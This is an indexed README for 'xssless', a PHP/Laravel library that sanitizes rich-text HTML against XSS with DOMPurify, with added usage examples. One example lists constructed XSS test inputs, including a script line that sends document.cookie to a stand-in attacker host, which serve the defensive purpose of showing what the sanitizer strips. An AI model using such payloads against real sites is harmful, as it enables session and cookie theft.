Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/medilies/xssless

Clean your rich text from XSS threats.

cleaner html laravel purifier sanitizer xss

Last synced: about 2 months ago

README
# Clean your rich text from XSS threats

[![Latest Version on Packagist](https://img.shields.io/packagist/v/medilies/xssless.svg?style=flat-square)](https://packagist.org/packages/medilies/xssless)
[![pest](https://img.shields.io/github/actions/workflow/status/medilies/xssless/run-tests.yml?branch=main&label=tests&style=flat-square)](https://github.com/medilies/xssless/actions?query=workflow%3Arun-tests+branch%3Amain)
[![phpstan](https://img.shields.io/github/actions/workflow/status/medilies/xssless/phpstan.yml?branch=main&label=phpstan&style=flat-square)](https://github.com/medilies/xssless/actions?query=workflow%3A"phpstan"+branch%3Amain)

![workflow](./workflow.png)

## Why use Xssless

- Your application features a [Rich Text Editor](https://en.wikipedia.org/wiki/Online_rich-text_editor) and you need to render the user-supplied HTML it produces without letting it carry XSS payloads.
- You want full HTML5 & CSS3 support.
- You want to allow all safe HTML elements, their attributes, and CSS properties without maintaining a deep allow-list configuration yourself.

The default driver aligns with [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#html-sanitization) recommendations:

> ... OWASP recommends **DOMPurify** for HTML Sanitization.

Sanitization is the tool for fields that must be rendered as HTML. For plain-text fields, context-aware output encoding (Blade's `{{ }}`) remains the simpler and safer control.

## Requirements

- PHP >= 8.2
- ext-json
- Node >= 18
- NPM

## Installation

Install the package via composer:

```bash
composer require medilies/xssless
```

For non-Laravel projects, pick a driver config and run the setup once:

```php
<?php

use Medilies\Xssless\Dompurify\DompurifyCliConfig;
use Medilies\Xssless\Xssless;

// Paths (or names resolvable on PATH) of the node and npm binaries the driver will call
$config = new DompurifyCliConfig('node', 'npm');

// One-time setup for the chosen driver
(new Xssless)
    ->using($config)
    ->setup();
```

For Laravel projects, run the following command:

```shell
php artisan xssless:setup
```

## Usage

Using `Medilies\Xssless\Dompurify\DompurifyCliConfig` (no long-running service to manage):

```php
<?php

use Medilies\Xssless\Dompurify\DompurifyCliConfig;
use Medilies\Xssless\Xssless;

$clean = (new Xssless)
    ->using(new DompurifyCliConfig)
    ->clean($html);
```

Using `Medilies\Xssless\Dompurify\DompurifyServiceConfig` (a service process must be started before `clean()` is called):

```php
<?php

use Medilies\Xssless\Dompurify\DompurifyServiceConfig;
use Medilies\Xssless\Xssless;

// Keep the service on loopback unless the network path to it is trusted:
// it accepts arbitrary HTML from anything that can reach the port.
$config = new DompurifyServiceConfig(
    host: '127.0.0.1',
    port: 63000
);

$xssless = (new Xssless)
    ->using($config);

/**
 * It is better to have this part in a separate script
 * that runs continuously and independently from your app
 */
$xssless->start();

$clean = $xssless->clean($html);
```
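As an added example (not code from the package or its README), here is how the CLI driver fits into a plain-PHP save path, with the behaviour a practitioner usually wants around a sanitizer: clean on the way in, store the sanitized markup, and fail closed if the cleaner itself cannot run. The sample payloads are constructed; it is assumed that `clean()` returns the sanitized HTML as a string and throws when the node process cannot be run, and the `sanitize_rich_text` helper name is mine.

```php
<?php

use Medilies\Xssless\Dompurify\DompurifyCliConfig;
use Medilies\Xssless\Xssless;

/**
 * Sanitize rich text on the way into storage.
 * Assumption: clean() returns the sanitized HTML as a string and throws
 * if the node process cannot be run.
 */
function sanitize_rich_text(Xssless $xssless, string $html): string
{
    try {
        return $xssless->clean($html);
    } catch (\Throwable $e) {
        // Fail closed: if DOMPurify is unavailable, never store raw markup.
        // Escaping turns the submission into inert text instead of dropping it.
        error_log('xssless unavailable, escaping input instead: ' . $e->getMessage());

        return htmlspecialchars($html, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

$xssless = (new Xssless)->using(new DompurifyCliConfig('node', 'npm'));

// Constructed samples: ordinary editor output plus common XSS vectors
$samples = [
    '<p>Hello <strong>world</strong></p>',
    '<img src="x" onerror="alert(1)">',
    '<a href="javascript:alert(1)">click</a>',
    '<p>text</p><script>document.location="https://attacker.example/?"+document.cookie</script>',
];

foreach ($samples as $html) {
    $clean = sanitize_rich_text($xssless, $html);

    // With DOMPurify's defaults the onerror handler, the javascript: URL and the
    // <script> element are removed, while the harmless markup survives.
    printf("%s\n  -> %s\n", $html, $clean);
}
```

The fallback to `htmlspecialchars()` is deliberate: a sanitizer outage should degrade to plain, escaped text, not to stored raw HTML that a later view renders unescaped.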

### Laravel usage

You can publish the config file with:

```bash
php artisan vendor:publish --tag="xssless-config"
```

This is the contents of the published config file:

```php
<?php

use Medilies\Xssless\Dompurify\DompurifyCliConfig;
use Medilies\Xssless\Dompurify\DompurifyServiceConfig;

return [
    // Driver used by the Xssless facade
    'default' => 'dompurify-cli',

    'drivers' => [
        'dompurify-cli' => new DompurifyCliConfig(
            node: env('NODE_PATH', 'node'), // @phpstan-ignore argument.type
            npm: env('NPM_PATH', 'npm'), // @phpstan-ignore argument.type
            binary: null,
            tempFolder: null,
        ),

        'dompurify-service' => new DompurifyServiceConfig(
            node: env('NODE_PATH', 'node'), // @phpstan-ignore argument.type
            npm: env('NPM_PATH', 'npm'), // @phpstan-ignore argument.type
            host: '127.0.0.1',
            port: 63000,
            binary: null,
        ),
    ],
];
```

If the default driver is `dompurify-service`, start the service process (the `dompurify-cli` driver does not need this):

```shell
php artisan xssless:start
```

Use the facade:

```php
Medilies\Xssless\Laravel\Facades\Xssless::clean($html);
```
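As an added example (not the package's own code), here is where the facade usually sits in a Laravel request cycle: once, at the trust boundary, before the markup is persisted. `App\Models\Post`, the `posts.show` route, the validation limits and the view path are hypothetical, and it is assumed that `Xssless::clean()` returns the sanitized HTML as a string.

```php
<?php

namespace App\Http\Controllers;

use App\Models\Post; // hypothetical model with `title` and `body` columns
use Illuminate\Http\RedirectResponse;
use Illuminate\Http\Request;
use Medilies\Xssless\Laravel\Facades\Xssless;

class PostController extends Controller
{
    public function store(Request $request): RedirectResponse
    {
        // Validation bounds the size; it does not make the HTML safe.
        $data = $request->validate([
            'title' => ['required', 'string', 'max:200'],
            'body'  => ['required', 'string', 'max:100000'],
        ]);

        // Sanitize once at the boundary and persist the sanitized markup, so
        // everything downstream can treat `body` as HTML that is safe to render.
        // Assumption: clean() returns the sanitized HTML as a string.
        $post = Post::create([
            'title' => $data['title'], // plain text: left as-is, escaped on output
            'body'  => Xssless::clean($data['body']),
        ]);

        return redirect()->route('posts.show', $post);
    }
}

// In the hypothetical Blade view resources/views/posts/show.blade.php:
//   {{ $post->title }}    escaped, because title is plain text
//   {!! $post->body !!}   unescaped, only because body was cleaned in store()
```

Cleaning on input freezes the result at write time: a document stored before a DOMPurify update is not re-cleaned by that update. If that matters for your data, clean again at render time as well, at the cost of one sanitizer call per view.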

## Changelog

Please see [CHANGELOG](CHANGELOG.md) for more information on what has changed recently.

## Contributing

Please see [CONTRIBUTING](CONTRIBUTING.md) for details.

## Security Vulnerabilities

Please review [our security policy](../../security/policy) on how to report security vulnerabilities.

## Credits

- [medilies](https://github.com/medilies)
- [All Contributors](../../contributors)

## License

The MIT License (MIT). Please see [License File](LICENSE.md) for more information.